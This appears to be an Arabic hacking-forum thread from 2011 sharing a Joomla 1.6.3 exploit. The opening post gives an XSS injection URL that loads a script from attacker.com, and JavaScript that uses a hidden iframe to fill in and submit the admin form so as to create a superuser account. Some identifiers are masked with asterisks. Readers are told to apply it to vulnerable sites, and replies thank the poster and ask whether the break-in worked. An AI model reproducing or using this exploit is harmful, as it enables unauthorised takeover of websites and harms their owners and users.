آخر ثغرات الجوملة

Dr.Mix · 07-06-2011, 08:13 PM

سلام يا اخوان كيفكم ان شاء الله بالف خير

اليوم جايب لكم اخر الثغرات في الجوملة

كود PHP:

  This vulnerability takes advantage of the recent Joomla 1.6.3 XSS vulnerability ( http://seclists.org/fulldisclosure/2011/Jun/519 ) to execute a CSRF vulnerability to create a superuser account.

***65279;

/*

joom163.js

Joomla 1.6.3 XSS -> CSRF Exploit

Greetz to Shardy, Xires & Stacy, Rage, coorslitedude, Nothingness, MaXe

Coded By: Connection

 

Vuln Link: index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";'>"><script src=http://attacker.com/joom163.js></script>

 

*/

********.writeln('<****** id="******" src="http://victim.com/administrator/index.php?option=com_users&view=user&layout=edit" width="0" height="0" style="visibility:hidden;" onload="read()"></******>');

 

function read()

{

var name="Test";

var username="haxx";

var password="test123";

var email="fake _at_ gmail.com";

 

********.getElementById("******").content********.forms[0].jform_name.value = name;

********.getElementById("******").content********.forms[0].jform_username.value = username;

********.getElementById("******").content********.forms[0].jform_password.value = password;

********.getElementById("******").content********.forms[0].jform_password2.value = password;

********.getElementById("******").content********.forms[0].jform_email.value = email;

********.getElementById("******").content********.forms[0].getElementById("1group_8").checked=true;

********.getElementById("******").content********.getElementsByTagName("a")[11].onclick();

طبق هادا على الموقع المصاب :
index.php?option=com_contact&view=category&catid=2 6&id=36&Itemid=-1

ان شاء الله تكون شغالة

اخوكم الهكر المحشش(Haboubamix) :lol:

المصدر: :: vBspiders Professional Network ::

Nov eyvhj hg[,lgm

ViRuS Qalaa · 07-06-2011, 08:15 PM

مشكور اخي ع الثغرة

JetLi · 07-06-2011, 09:04 PM

ارجو الرفع في المرفقات لان المنتدى يحجب بعض الاكواد

Dr.Mix · 07-07-2011, 01:54 AM

لقد تم يا اخي الرفع في 4shared

http://www.4shared.com/get/V1OomLZi/...spiders--.html

fantasy--xX · 07-07-2011, 02:09 AM

اخوي انا مبتدئ لكن لما القى الموقع المصاب واحط الثغرة واروح مصدر الصفحة ما القى اللي تقول عليها

اعذرني اذا انا غلطان لاني مبتدئ جدا جدا ما اعرف غير ثغرة السكيول الكلاسيكية

Dr.Mix · 07-07-2011, 02:43 AM

اخي والله ما فهمت اي شيئ في كلامك المرجوا التفسير اخي

vpn_31 · 07-07-2011, 03:30 AM

تسلم عطرح سغره

4nT! H3lL · 07-08-2011, 04:54 PM

شكرا ع الثغره

dahapp · 07-09-2011, 06:17 AM

مشكور ياغالى

bayrem23 · 07-09-2011, 07:08 AM

مشكور ياغالى

migamix · 07-09-2011, 03:22 PM

أين سكريب الجافا تاع الاستغلال ؟؟ joom163.js
http://attacker.com/joom163.js
سآل من فضلك
هل جربت التغرة علي أحد المواقع ؟؟؟
وهل نجحت في الاقتحام
أرجو الرد أخي
في انتضارك